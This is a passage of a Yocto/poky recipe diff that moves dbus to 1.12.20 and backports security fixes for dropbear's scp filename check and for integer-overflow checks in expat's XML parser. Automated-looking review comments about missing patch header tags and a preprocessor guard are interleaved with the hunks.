+++ b/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb
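Review bot: CVE-2021-423xx-awk.patch tags eight CVEs (`CVE-2021-42378` through `CVE-2021-42386`), but the hunks it carries only touch `TC_CONCAT1`, `tokeninfo`, `next_token`, `parse_expr`, `awk_split` with the new `regexec1_nonempty`, and a comment in `awk_getline`; the `Comment:` line says the other hunks were removed as already present in the source. Every `CVE:` tag will be read as "patched" by CVE scanning that trusts patch headers, so the claim should be checkable: I would add a short list to the header mapping each CVE to the function that fixes it and marking the ones covered by code already in 1.31.1. Separately, in `regexec1_nonempty` the result of the inner `regexec(preg, s + ofs, 1, pmatch, 0)` is discarded, so the loop appears to rely on `pmatch[0].rm_eo` staying 0 after a failed match; a one-line comment saying so would help the next backport.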
@@ -1,57 +1,31 @@ SUMMARY = "D-Bus test package (for D-bus functionality testing only)" HOMEPAGE = "http://dbus.freedesktop.org" SECTION = "base" -LICENSE = "AFL-2.1 | GPLv2+" -LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ - file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" -DEPENDS = "dbus glib-2.0" +require dbus.inc -RDEPENDS_${PN}-dev = "" +SRC_URI += "file://run-ptest \ + file://python-config.patch \ + " -SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ - file://tmpdir.patch \ - file://run-ptest \ - file://python-config.patch \ - file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ - " +DEPENDS = "dbus glib-2.0" -SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" -SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80" +RDEPENDS_${PN}-dev = "" S="${WORKDIR}/dbus-${PV}" FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:" -inherit autotools pkgconfig gettext ptest upstream-version-is-even +inherit ptest -EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}" -EXTRA_OECONF_X_class-native = "--without-x" - -EXTRA_OECONF = "--enable-tests \ +EXTRA_OECONF += "--enable-tests \ --enable-modular-tests \ --enable-installed-tests \ --enable-checks \ --enable-asserts \ - --enable-largefile \ - --disable-xml-docs \ - --disable-doxygen-docs \ - --disable-libaudit \ --with-dbus-test-dir=${PTEST_PATH} \ - ${EXTRA_OECONF_X} \ --enable-embedded-tests \ " -EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}" -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" -PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, 
virtual/libx11 libsm" -PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" -PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,," - do_install() { : } diff --git a/poky/meta/recipes-core/dbus/dbus.inc b/poky/meta/recipes-core/dbus/dbus.inc new file mode 100644 index 0000000000..dcbcc0a9d6 --- /dev/null +++ b/poky/meta/recipes-core/dbus/dbus.inc @@ -0,0 +1,34 @@ +inherit autotools pkgconfig gettext upstream-version-is-even + +LICENSE = "AFL-2.1 | GPLv2+" +LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ + file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" + +SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ + file://tmpdir.patch \ + file://dbus-1.init \ + file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ +" + +SRC_URI[md5sum] = "dfe8a71f412e0b53be26ed4fbfdc91c4" +SRC_URI[sha256sum] = "f77620140ecb4cdc67f37fb444f8a6bea70b5b6461f12f1cbe2cec60fa7de5fe" + +EXTRA_OECONF = "--disable-xml-docs \ + --disable-doxygen-docs \ + --disable-libaudit \ + --enable-largefile \ + --with-system-socket=/run/dbus/system_bus_socket \ + " +EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" +EXTRA_OECONF_append_class-native = " --disable-selinux" + +PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \ + user-session \ + " +PACKAGECONFIG_class-native = "" +PACKAGECONFIG_class-nativesdk = "" + +PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" +PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" +PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" +PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,," 
diff --git a/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch deleted file mode 100644 index ac7a4b7a71..0000000000 --- a/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch +++ /dev/null 
@@ -1,78 +0,0 @@ -From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001 -From: Simon McVittie <smcv@collabora.com> -Date: Thu, 16 Apr 2020 14:45:11 +0100 -Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive - -MSG_CTRUNC indicates that we have received fewer fds that we should -have done because the buffer was too small, but we were treating it -as though it indicated that we received *no* fds. If we received any, -we still have to make sure we close them, otherwise they will be leaked. - -On the system bus, if an attacker can induce us to leak fds in this -way, that's a local denial of service via resource exhaustion. - -Reported-by: Kevin Backhouse, GitHub Security Lab -Fixes: dbus#294 -Fixes: CVE-2020-12049 -Fixes: GHSL-2020-057 - -Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63] -CVE: CVE-2020-12049 -Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> ---- - dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------ - 1 file changed, 20 insertions(+), 12 deletions(-) - -diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c -index b5fc2466..b176dae1 100644 ---- a/dbus/dbus-sysdeps-unix.c -+++ b/dbus/dbus-sysdeps-unix.c -@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd, - struct cmsghdr *cm; - dbus_bool_t found = FALSE; - -- if (m.msg_flags & MSG_CTRUNC) -- { -- /* Hmm, apparently the control data was truncated. The bad -- thing is that we might have completely lost a couple of fds -- without chance to recover them. Hence let's treat this as a -- serious error. 
*/ -- -- errno = ENOSPC; -- _dbus_string_set_length (buffer, start); -- return -1; -- } -- - for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm)) - if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS) - { -@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd, - if (!found) - *n_fds = 0; - -+ if (m.msg_flags & MSG_CTRUNC) -+ { -+ unsigned int i; -+ -+ /* Hmm, apparently the control data was truncated. The bad -+ thing is that we might have completely lost a couple of fds -+ without chance to recover them. Hence let's treat this as a -+ serious error. */ -+ -+ /* We still need to close whatever fds we *did* receive, -+ * otherwise they'll never get closed. (CVE-2020-12049) */ -+ for (i = 0; i < *n_fds; i++) -+ close (fds[i]); -+ -+ *n_fds = 0; -+ errno = ENOSPC; -+ _dbus_string_set_length (buffer, start); -+ return -1; -+ } -+ - /* put length back (doesn't actually realloc) */ - _dbus_string_set_length (buffer, start + bytes_read); - --- -2.25.1 - diff --git a/poky/meta/recipes-core/dbus/dbus_1.12.16.bb b/poky/meta/recipes-core/dbus/dbus_1.12.20.bb index 10d1b34448..cf6f7dc0ef 100644 --- a/poky/meta/recipes-core/dbus/dbus_1.12.16.bb +++ b/poky/meta/recipes-core/dbus/dbus_1.12.20.bb 
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus" DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed." HOMEPAGE = "https://dbus.freedesktop.org" SECTION = "base" -LICENSE = "AFL-2.1 | GPLv2+" -LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ - file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" + +require dbus.inc + DEPENDS = "expat virtual/libintl autoconf-archive" RDEPENDS_dbus_class-native = "" RDEPENDS_dbus_class-nativesdk = "" @@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '', ALLOW_EMPTY_dbus-ptest = "1" RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest" -SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ - file://tmpdir.patch \ - file://dbus-1.init \ - file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ - file://CVE-2020-12049.patch \ -" - -SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" -SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80" - -inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even +inherit useradd update-rc.d INITSCRIPT_NAME = "dbus-1" INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ." 
@@ -93,27 +83,7 @@ pkg_postinst_dbus() { } -EXTRA_OECONF = "--disable-tests \ - --disable-xml-docs \ - --disable-doxygen-docs \ - --disable-libaudit \ - --enable-largefile \ - --with-system-socket=/run/dbus/system_bus_socket \ - " - -EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" -EXTRA_OECONF_append_class-native = " --disable-selinux" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \ - user-session \ - " - -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" -PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" -PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" +EXTRA_OECONF += "--disable-tests" do_install() { autotools_do_install diff --git a/poky/meta/recipes-core/dropbear/dropbear.inc b/poky/meta/recipes-core/dropbear/dropbear.inc index d41e8b36dc..b949a9a337 100644 --- a/poky/meta/recipes-core/dropbear/dropbear.inc +++ b/poky/meta/recipes-core/dropbear/dropbear.inc @@ -22,7 +22,9 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \ file://dropbear.socket \ file://dropbear.default \ ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ - ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} " + ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \ + file://CVE-2020-36254.patch \ + " PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \ file://0006-dropbear-configuration-file.patch \ 
diff --git a/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
+From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
+From: Haelwenn Monnier <contact+github.com@hacktivis.me>
+Date: Mon, 25 May 2020 14:54:29 +0200
+Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
+
+Reference:
+https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
+
+CVE: CVE-2020-36254
+Upstream-Status: Backport
+
+---
+ scp.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/scp.c b/scp.c
+index 742ae00..7b8e7d2 100644
+--- a/scp.c
++++ b/scp.c
+@@ -935,7 +935,8 @@ sink(int argc, char **argv)
+ size = size * 10 + (*cp++ - '0');
+ if (*cp++ != ' ')
+ SCREWUP("size not delimited");
+- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
++ if (*cp == '\0' || strchr(cp, '/') != NULL ||
++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
+ run_err("error: unexpected filename: %s", cp);
+ exit(1);
+ }
diff --git a/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch
new file mode 100644
index 0000000000..523449e22c
--- /dev/null
+++ b/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch
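Review bot: The header of dropbear's CVE-2020-36254.patch has a bare `Upstream-Status: Backport` with no commit reference and no `Signed-off-by:` from whoever did the backport, unlike the busybox patches in this same update. The commit under `Reference:` appears to be the upstream source, so the tag can carry it: `Upstream-Status: Backport [https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff]`. That keeps the provenance of a security fix in the field that patch-review tooling reads. `sink()` continues outside the inner hunk.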
@@ -0,0 +1,65 @@
+From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 27 Dec 2021 20:15:02 +0100
+Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
+ storeAtts (CVE-2021-45960)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
+
+CVE: CVE-2021-45960
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
+ 1 file changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d730f41c3..b47c31b05 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ if (nPrefixes) {
+ int j; /* hash table index */
+ unsigned long version = parser->m_nsAttsVersion;
+- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
+ unsigned char oldNsAttsPower = parser->m_nsAttsPower;
+ /* size of hash table must be at least 2 * (# of prefixed attributes) */
+ if ((nPrefixes << 1)
+@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ ;
+ if (parser->m_nsAttsPower < 3)
+ parser->m_nsAttsPower = 3;
+- nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ nsAttsSize = 1u << parser->m_nsAttsPower;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
+ nsAttsSize * sizeof(NS_ATT));
+ if (! temp) {
diff --git a/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch
new file mode 100644
index 0000000000..d6bafba0ff
--- /dev/null
+++ b/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch
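Review bot: The overflow check before `REALLOC` in `storeAtts` is compiled only under `#if UINT_MAX >= SIZE_MAX`, and CVE-2021-45960.patch adds no include, so it depends on `xmlparse.c` already pulling in headers that define both macros. An undefined macro evaluates as 0 in `#if`, so if `UINT_MAX` were missing the guard would be false and the check would drop out silently on targets where `unsigned int` is as wide as `size_t`, which is where it is needed. This cannot be confirmed from the hunk; it is worth checking the recipe's expat version for `#include <limits.h>` and a source of `SIZE_MAX`. The same guard is used in CVE-2021-46143.patch and CVE-2022-22822-27.patch, and `storeAtts` continues outside both inner hunks.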
@@ -0,0 +1,43 @@
+From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 25 Dec 2021 20:52:08 +0100
+Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
+ doProlog (CVE-2021-46143)
+
+---
+ expat/lib/xmlparse.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index b47c31b0..8f243126 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_prologState.level >= parser->m_groupSize) {
+ if (parser->m_groupSize) {
+ {
++ /* Detect and prevent integer overflow */
++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ char *const new_connector = (char *)REALLOC(
+ parser, parser->m_groupConnector, parser->m_groupSize *= 2);
+ if (new_connector == NULL) {
+@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+
+ if (dtd->scaffIndex) {
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ int *const new_scaff_index = (int *)REALLOC(
+ parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
+ if (new_scaff_index == NULL)
diff --git a/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
new file mode 100644
index 0000000000..e569fbc7ab
--- /dev/null
+++ b/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
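Review bot: CVE-2021-46143.patch goes straight from `Subject:` to `---` with no `CVE:`, `Upstream-Status:` or `Signed-off-by:` line, while the two expat patches beside it carry all three. Without them the only link to the CVE is the file name and the subject, and nothing points to the upstream commit the backport was taken from. I would add `CVE: CVE-2021-46143` and `Upstream-Status: Backport [<upstream commit URL>]`, plus the backporter's sign-off. `doProlog` continues outside both inner hunks.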
@@ -0,0 +1,257 @@ +From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping <sebastian@pipping.org> +Date: Thu, 30 Dec 2021 22:46:03 +0100 +Subject: [PATCH] lib: Prevent integer overflow at multiple places + (CVE-2022-22822 to CVE-2022-22827) + +The involved functions are: +- addBinding (CVE-2022-22822) +- build_model (CVE-2022-22823) +- defineAttribute (CVE-2022-22824) +- lookup (CVE-2022-22825) +- nextScaffoldPart (CVE-2022-22826) +- storeAtts (CVE-2022-22827) + +Upstream-Status: Backport: +https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e + +CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827 +Signed-off-by: Steve Sakoman <steve@sakoman.com> + +--- + expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++- + 1 file changed, 151 insertions(+), 2 deletions(-) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index 8f243126..575e73ee 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + + /* get the attributes from the tokenizer */ + n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts); ++ ++ /* Detect and prevent integer overflow */ ++ if (n > INT_MAX - nDefaultAtts) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + if (n + nDefaultAtts > parser->m_attsSize) { + int oldAttsSize = parser->m_attsSize; + ATTRIBUTE *temp; + #ifdef XML_ATTR_INFO + XML_AttrInfo *temp2; + #endif ++ ++ /* Detect and prevent integer overflow */ ++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE) ++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE; ++ ++ /* Detect and prevent integer overflow. 
++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) { ++ parser->m_attsSize = oldAttsSize; ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts, + parser->m_attsSize * sizeof(ATTRIBUTE)); + if (temp == NULL) { +@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + } + parser->m_atts = temp; + #ifdef XML_ATTR_INFO ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++# if UINT_MAX >= SIZE_MAX ++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) { ++ parser->m_attsSize = oldAttsSize; ++ return XML_ERROR_NO_MEMORY; ++ } ++# endif ++ + temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo, + parser->m_attsSize * sizeof(XML_AttrInfo)); + if (temp2 == NULL) { +@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + tagNamePtr->prefixLen = prefixLen; + for (i = 0; localPart[i++];) + ; /* i includes null terminator */ ++ ++ /* Detect and prevent integer overflow */ ++ if (binding->uriLen > INT_MAX - prefixLen ++ || i > INT_MAX - (binding->uriLen + prefixLen)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + n = i + binding->uriLen + prefixLen; + if (n > binding->uriAlloc) { + TAG *p; ++ ++ /* Detect and prevent integer overflow */ ++ if (n > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. 
*/ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char)); + if (! uri) + return XML_ERROR_NO_MEMORY; +@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId, + if (parser->m_freeBindingList) { + b = parser->m_freeBindingList; + if (len > b->uriAlloc) { ++ /* Detect and prevent integer overflow */ ++ if (len > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + XML_Char *temp = (XML_Char *)REALLOC( + parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE)); + if (temp == NULL) +@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId, + b = (BINDING *)MALLOC(parser, sizeof(BINDING)); + if (! b) + return XML_ERROR_NO_MEMORY; ++ ++ /* Detect and prevent integer overflow */ ++ if (len > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + b->uri + = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE)); + if (! 
b->uri) { +@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata, + } + } else { + DEFAULT_ATTRIBUTE *temp; ++ ++ /* Detect and prevent integer overflow */ ++ if (type->allocDefaultAtts > INT_MAX / 2) { ++ return 0; ++ } ++ + int count = type->allocDefaultAtts * 2; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) { ++ return 0; ++ } ++#endif ++ + temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts, + (count * sizeof(DEFAULT_ATTRIBUTE))); + if (temp == NULL) +@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) { + /* check for overflow (table is half full) */ + if (table->used >> (table->power - 1)) { + unsigned char newPower = table->power + 1; ++ ++ /* Detect and prevent invalid shift */ ++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) { ++ return NULL; ++ } ++ + size_t newSize = (size_t)1 << newPower; + unsigned long newMask = (unsigned long)newSize - 1; ++ ++ /* Detect and prevent integer overflow */ ++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) { ++ return NULL; ++ } ++ + size_t tsize = newSize * sizeof(NAMED *); + NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize); + if (! newV) +@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) { + if (dtd->scaffCount >= dtd->scaffSize) { + CONTENT_SCAFFOLD *temp; + if (dtd->scaffold) { ++ /* Detect and prevent integer overflow */ ++ if (dtd->scaffSize > UINT_MAX / 2u) { ++ return -1; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. 
*/ ++#if UINT_MAX >= SIZE_MAX ++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) { ++ return -1; ++ } ++#endif ++ + temp = (CONTENT_SCAFFOLD *)REALLOC( + parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD)); + if (temp == NULL) +@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) { + XML_Content *ret; + XML_Content *cpos; + XML_Char *str; +- int allocsize = (dtd->scaffCount * sizeof(XML_Content) +- + (dtd->contentStringLen * sizeof(XML_Char))); ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) { ++ return NULL; ++ } ++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) { ++ return NULL; ++ } ++#endif ++ if (dtd->scaffCount * sizeof(XML_Content) ++ > (size_t)(-1) - 